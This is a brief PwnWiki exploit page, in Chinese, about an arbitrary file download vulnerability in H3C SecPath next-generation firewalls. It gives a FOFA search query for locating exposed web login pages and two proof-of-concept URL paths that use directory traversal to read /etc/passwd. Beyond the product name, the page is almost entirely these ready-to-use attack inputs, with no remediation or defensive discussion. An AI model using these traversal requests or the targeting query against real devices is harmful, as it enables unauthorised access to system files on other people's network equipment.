H3C SecPath 下一代防火墙任意文件下载漏洞

From PwnWiki

This page is a translated version of the page H3C SecPath 下一代防火牆任意文件下載漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎中文（中国大陆）‎

漏洞影响

H3C SecPath

FOFA

title="Web user login"

POC

/webui/?g=sys_dia_data_down&file_name=../etc/passwd

/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd

Retrieved from "https://pwnwiki.com/index.php?title=H3C_SecPath_下一代防火牆_任意文件下載漏洞/zh-cn&oldid=5326"